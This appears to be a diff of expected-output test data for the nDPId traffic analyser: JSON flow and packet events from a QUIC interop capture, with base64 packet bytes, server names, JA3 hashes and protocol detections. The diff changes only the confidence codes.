+01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434609,"flow_last_seen":1603816434609,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434609,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1603816434609,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434609,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA990AAC0BNLcznmliwKgBgAMKP5oAAAAARQAFAKEiQAAwEUWiwKgBgDOeaWLKrwG7BOynncIKCgoKCBGs9QKfvVcQAABE0lvluJrmL\/hMeUw3YRhBIJ\/7gLtKpaIz\/yfYSAz6s8M\/iZU1xT7UiPmoiPsMT3FCwMnulK4pxlFMwSTfXCJHpc614jjRRPQY0r4A52kRAqbpnpm4pGdhwJNk2VhjYh04QB+ATZnDkcsklWaxwa1n6YHU9l\/hwXdVfRMJRZaRjlnNVjFzYTJDWF1bqR3R+8VW0waOTiwhJbmwo0jy0HGIxrRni0iCPehpoLwTjyK71TyZayvNhxdtGvZzTbpHaeAT15y\/CNrfq29HSv4IbvE0UmtwPnAkf\/K1m2amootTqW7mZ0NRHFK3HiA6yyoxrFYKU9\/CqXLS00PyxBFYvXIH8JHdvMhif7EW2Q2vZzfwwkJPwkHVXd+ngfY6wGLILtNDXV2ivGtdy3XuvH2ccmQEKSFZ73Hx9iHdBl6qjfCYRhGp6e+IEQqSNu4vIjwJrHd1DI7AFuP5HVV3t0uwiRNlmNLYg\/\/iQ8SXBZOZZXE4JJ7SqpmG4T8bxGnZ3BCjiEFishkM4w78EsJooOt\/y+Ru+rpDXeXF0DEDfcvmU78O5MK3Ul65ZjzZQp5A08B7wuQCd5NseMaqkP4jaydGTyiWvmW0mmoH\/qDqrJMH+DDDY2TMH7n1pK4uNzfng27Vymwlz4bVFY+NOz3R05sw0AhIXP9mFCKSmts="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434609,"flow_last_seen":1603816434609,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434609,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.654703} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434609,"flow_last_seen":1603816434609,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434609,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.654703} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1603816434622,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434622,"pkt":"PKn0qB\/spJGxgjQ5ht1gDsWjACMR8CoF0BgM6YEAzSri\/bO+xasgAQsHCsnVrqTT\/kdpHoB9EVGcCQAjCvHgAAAAAAAIawwAN\/DoMJL\/AAAd\/wAAHP8AABs="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1603816434628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434628,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAStBAAEARganAqAGAyu7cXJgVAbsE7FzZxgoKCgoISaS\/HP4FIE0AAETS8b\/jD+OLMZ5ZfmIPp7wLwtSW\/3e3V56tG1ccXR3vL4iMRvcTifVjxLwR1VEj5kxXicua4ELuOiBh14YJiINigpT2w+4dKhfV++T2HAdDXb9HRo8Wp5\/Q2I0xH7P0GEZjVSlxh\/KVM7Q8JSVkblMvtsmlTbMHoKyKgv5ZVuhR9rKzyWjc0bDTpihNkKGhI2W23K8YpCOo163pvnpUs8vCjpMKx6Y+XLOjz86VHxZ\/dSIUgwZkfU3hXvxraGDqsOM6nk2BsxRj6ED+eksutrG0VvP5Wbl\/nwohJ3snk4n+kCBY8+CDoT5Q6xIqcKNeqA91veY6WDNW65NdLK9tq0Kt6NyRCQ0iHC1fm8oqxzK49Xy9Yr2klZXjGA6Wb9UmYx6KSJdvg6i+UYQf+hP3vTAcVrvclwQjn1Ttts6+sIXx63DdYoKsDizIkqnYCVuj0roAtIdLG95OmHxjKHrmpsQyLltGhTZMsYJQRCx5M8PpL+vjXo6pu+GHq\/GNM20vpbcH4SfliMSbdeHv4qviRxdJ9R8w9OkBT6XZozO3wWdBmA6PqET53j\/ug0iSc1MIiO+\/q4LSySrTDiP2OBzfwZT7hTAaYz1DN1CxY6wbbPEjnyqCdpqZ1PaOkaWb8OYt7bm6J9VMzWbMZaVbajU0njanBfI51vKbom0V4qvMvcrqXEEunVPVtjgIskNplvDAftVJ2vZJjRMGUEv2c4SLniMT\/gRm2OeeaPXHe1brAnbRvP5KwVwSyHq8W08M66VBt+caimizIdJuqJqF1FGzRpHgQJNETaOqosq4CaLQrU1BEEg3UbRSYSWKj7OLTgEqG1JOZb\/nz1GI+TfOOMiy+107aqM+S\/i3Tju69xYk1X3WP1Ozrd6Wj6AC50FxHQQFSXlNPa5e\/vjVo4rFyU+uJE9u8JoYphh7MyJDB1VngH+kgiqxcBa2QBM5E51d4uR1hQLe+c6gd3MDh43gdsQryQiQifYdGhNRWZZaw2p8fRtUP4Uwyq\/B0bHFpZ4t6PuvIBU1+212nGGZUAL7j3HFR48RnO1qbO+GAhey5N9lWYMlU5tavGiXfOhlX6cAsUEQ2Q6TLV\/ZCB5CQG5QDTtdPH0QZSPPPDEVyy6HE2QB0rH4vjru2j5voDUPBjLlpBQ\/NL5R+mTgOnDFh7tGqQnBHhyDGFO\/50NeIGNTAc07+9N1IfFyQChGLc3grwS1SkOgfURlQLF+0ioikEL5irbMrmWTd851GONI9exui+8KOT8c959NcGrcyY1CIpxJc6JPQNgq4cGI4ljycOhrXFfcY+tJlEO3E0yGYN4gMAGSars7BkXFZLPWbZY+Sb4jXpDImxv+f95nzmTySeAQGcAaOitCLcJ318ljtkj4SzzBlngK7\/jHpA1EPvZ2SJKmWjryUfQf4JJVEzK0DHUTA6qLYV+785FtwR53Rvcfx8ZKasxHIdWmDmMQfSDcjCfFkiPKXadftOSR0e\/XsF34XRoyBUx5eKGVWThXeNxNkMdpKbVofP1BRG3kl02O63aebe4V6uZI5YzyQUh4Dl097fgC5KIZDSXh1zEWqkg2eojIxOsLE8glsZ++gAFLU+Q749QmZTjBy2vyjMlxdSRKWMC6H66lOKBGFFFOZV6nr8Cmiz6E4iT7yg=="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00647{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1603816434628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434628,"pkt":"pJGxgjQ5PKn0qB\/sht1gCIsNBNgRQCABCwcKydWupNP+R2kegH0qAKwAQAAEAALgTP\/+aBmdzC8RUgTYW27FCgoKCgiOjC+QJeVzXQAARL7JSt9fXYbHm89vAcaC3zVPl3CRJrP6TUqyl19zIq90T7T2NXCDcXHJobasDcuXuTxPvCCLEvFASvzCuAXXUk3HWjKo77c+LloXAI84Zwqo8KPwvyzsluIwpPaCQQSGiuEyjDniWlSc55j3zHtvxBYI+7qs\/+m2E9Qo9cHvaYLyJZyEsYiKOdymD9qvtzbmDAszHuIEjcfE2JjV4l3DJqKhapzLQbS9PctxujyF1VUI2ACV8ytLLBKZMFRXoJlO+bWzOXqbJSZ6o5mClNhR1vsaR6skwjkGqVgCBLklKilA+9\/6l4ZG3WIaUFiUoM7SgIxwWF8oyiKV7zmkaclu4f5\/3yzgGms+jvNfvtwGzb3Fgy2XF4aZ5O5HDcLbhvsSrvGKNU1KYKAXZ4nH8RB1\/jFqFn4mCqeFIiG1sLtiDLSix9f1+6LcFT10dfWo8qUHWrWQKOTbIY9nDBXTCntoa14qK3CE8mecM2VJ7ggYOHeAYHiK\/KSjuFeEFZdZUdhlNNgz9SYFL52F6XzgaZRwl5PM1sfRI+PVfN3H8HWyDW3URl12iKPr73MNCK5qktammCheXnaJBQPkIp2os8caGwd0tnC6YXcJ6lRUUduYnFyZK+vu28T7Dz\/LrOOfuQtWldYrGOIU6j6+ccDKu9WWuVGuX87kKb6hFa\/0Hcn3qf5Lj8lhGc0veQe668VrdjsW9Dbg+kfK24zU3dHzbLq\/XM+CIHEV0Yi\/cWiNNyuRa7ulzdTCAyRs9gYlEY9PmbmMmVnZTQWIYxLrJJXunKhqYDK1mFGTl5IvfBZY7XkX4mf2dHPjv4NDEk1QrCa1hHmGBMvl396\/dwaT6SqqWUBPCDC6vSElGrAMRRGJq9LvfuTt+lbz304CY2d8TLKimJoo6M2hj9FCUJij7LzuvBHoekrCNTyCpGkXK+6f28WuMzCkJmtH+2+vwCZ0cKmQ7CrGhhaebnvQZwlEFUK4HQuJy5pSXRkTWfe3guDQnvG2+9SrouXEZwHBxw4mhOlu4pZjXEqExMqWvswlRLClP4rnliDXpHH40rXKEVBoT8v\/j3qP19acEvtZNPaR+ixqYrvXUyjrT2RlXNw57\/diViUriBwdc6BZan7TmLF2I9JRDJyDmqg737XOiOdNXmktfhguZlHvtu8BzXOxe9QBMRua9UDc+uCEMwFmlIsRXS+UZdgutMlJZ1Lbmq8+H9dnSORxZcpeFndW83URbDqnqh3rTxU46PizBvjU3UUHxGcviHiAab4O\/xs7Wgwm5afjOM4HWTr2GZZohe06rmbLxZYWQRT95qnnPQz6O3YXVkngtM49zsYfYtwWc\/15r8OVdncTVWq9tmcsY+IComKrHlZhTs92vAihW5Z6kvjaWc9ntG7+kh9ebleS75pVIAPP3qfgdh\/HVMZQrPcJuQH8Y\/E2UgruG3vXoC9MYlyYHSvs\/p0NoudzrUECbg4P227GFsxLEbPUVjR8LlC7rVNTvhNIZWwC\/QrTxuvgRdHhiNNC8M2PCOHRg+GtiTF2\/CGbeBUpGmKvLPodeqZZylHTZhjgU1MkqVoyyY00fBkWduQkCMwlkuamhmTtYdY4kHKiR0ij2DmQLnLbFkclRCdK5g1smA=="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1603816434628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434628,"pkt":"pJGxgjQ5PKn0qB\/sht1gBiRvBNgRQCABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTABx2ARUQTYzffDCgoKCggnNhDgZJaMQwAARL5IzeYAwPvJhqXqSzYyuvoAe\/H9DvMh4rH9IopmFLLCj+PhBdGZ40ll7ADayrGRVomiqXfQeeqE4lI0JVucWTRV10wN\/2X8338TTB6+1v0VW\/8KTorpg06AYkrrASXu2b1BsrKpwLL271kd\/dx+mnQSA2BQKuHrVBCwcaBHI0r8YyjQ1srYGqRDA+zKcgWvk4OEb2anzxkS+TxZp3BCgoJSxTVTaR5r447ESHGMmgukiZT5KEHWyWxF9d02oG1WB5o1fyWZF5XPYIfDooBiT1AvbGvAvfKT01RDHMenDf9O5UT9ob9+XRCiw125P6PnFWGEuoX7atzAW9zVIg++DcOuD6bQBa6hwrgrZiQuNBd8kuQqMdvHefesXx4K8g4hi0yN8Q2JiBx10ybm+sDchOmA+ZGI3KJA9MxZ0Sp73D0+bCJe480Wpk3E7r2Z4INozKeBGUIjWkyo7qFkmuan\/71DIvrB9t\/xagwgNTTJ3tPFFcZxULz8+MN\/EAmmnIbFUMJkGpaxaZkxUwzdBzzVfWgWxOxaXp6E\/Sp0HvH7wVBpKbhjbMf7v+XMfDLFzWRXSgKS3UI3Pb2wyqIDyMku47b+QW5Q8ogC6pRm7vw2ChoPyXCwYbBnsPUrSwZulaXZ21SytHaEU9+EZo8BWLIhbxHDWCqgcwiQOrN2ld6qsp3S\/Vk9wosbHKzGjZ8Fq0IulMECZI2u3F39UfOXkQRBydLXb8SJP0YbtSDYwJVwphKDdTuYShkSh02mqvLr++kOOrUBElEDb2FTjuj4gpf7X+VxQEKj1eV44pEqEnAkpTwMxZvrlvupezB2DaPuSdgJ2oTp\/O7zZVUZF0m\/4ldGEeQhWTjIV6CkEIKpRvwcA+UXJ\/KFZ8RG5C3FjLxgW6qDeZaa51INZ1jnCY0wbHYbjsu1o4BqZImbBcIYiSFGPgjyz05R3AU2gPyjMwQtepARpLhB2m2nPYRAMfmllWHd3xwrKK3Glp060Yi1hFmvIsxBYN\/HFmXph\/R7xAQ\/NCCsyb233XTR61h+5mjyr3kBdhvRp4FWAfrGEcdmYH09lxw8fsoI2fyGmlrIiLbF3Ib+dz+bKp06GWcTagDImEuKvHXDoqew6XT8CRp81NMwgYp2C0sRRT0X375VlYNNoST080OfYYTMWSZLZIXQh8aObm1WMLPdvWnM+yeTd\/mCvRRGkSoRfYLC7RPv4Px+NqngI+PBo1onxLjP+L4PKyIXY5M1Wb\/ntYVcCVD6Mu2L9o7pVgw2OSUjjv0o88lqeZ+5ZeeRR6GyrHda3BrAmnkZ+qpQgDgKYZH0YS\/dr3\/dP2b05Ar17LfJufSjGiJu4ojISm\/iPkcpJzhCB0Ulyrv0Qi0cZ\/5EJ37Gp3EGx9wtbixPCiSDCeFvjur1Q9TswIkIMcYKjzlTF8c4ari4VRXM+F7\/DFMpQowUPXMsTOknhf+QiC8PtIgajvJPz0z4ts8GtDrZNFWP1dmxLaXIf8adUNIotOd08gg+Fo+EaXwzTPqlyv8pnBs9YKcfmrjrW8mdx7psWvRm4G1XHb9iD7+F8FJK6uKYd40yFQLCG28wXMkr8rTqhU71QNHZ421qXPLwoECcRhsDGlUiQgzViqn2CQ=="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434629,"flow_last_seen":1603816434629,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434629,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 01187{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1603816434629,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434629,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAgVoAADQBpNWDnxjGwKgBgAMDhTkAAAAARQAFAE67QAA0EZSkwKgBgIOfGMaicxFRBOyPwMEKCgoKCAqQphKlf+flAABE0q1MzAF7B\/pTV0kG5xawMpe3HkhLaz5LmMUUyw3WhYoi5nbpPV7NpV4GM27AXpOgHO\/SzLtIdktFTC4TCKMp7m9qMnCbweSvMGChHkpC5U7w60\/uPzwGl47ucIe9rYiZgKyYjN+8oftGbKB4AlEqhdFs2MoFYovXtoKkQBN7VSB0IxvuY2TC3GidshXx3wTMXfzuo1\/6i1KLTmmNbxSq1CGPdP1PQ24uDLBbi+meANNn06rbl+K9tUdkmsxH+USREu4XCkprwqJDGZjipci4pVwimHHp5mYTfFDWt8XxRCHJmOScE5wt7DLDqP6wUv\/R9RjuGRN\/nD4BOc5F4KnrlgXBSjWA8uw\/1hUs9cHVpYBS0ltoa5wxXIx++EBaRxTWEi36GVZ65l2iVnWKkd\/xq7p88n0OTSzw9MX6zL1vpn8Q3b5hVpTOfk0XSi5xbalOfjBvaK425FOHISkLRT4hHBTrZPDUxwxwBg08G2H36nvO3sZ2DqZCH92UgDfl3OrnJTQ5kZer0RXiGe8JxWv76LxDqR1kJ0SXR282tjRVBUWk2yeunxwz3vNCj4omHVmk44mRi251cY+XJzT44HEva4iNMf74w7Rm7ot9s3dpNfVwJPF0r16L56vzdWhG5cGOJ1D+VSlbkJMR4r0BQwF2\/eCtSeTN+rk="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434629,"flow_last_seen":1603816434629,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434629,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.619289} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434629,"flow_last_seen":1603816434629,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434629,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.619289} 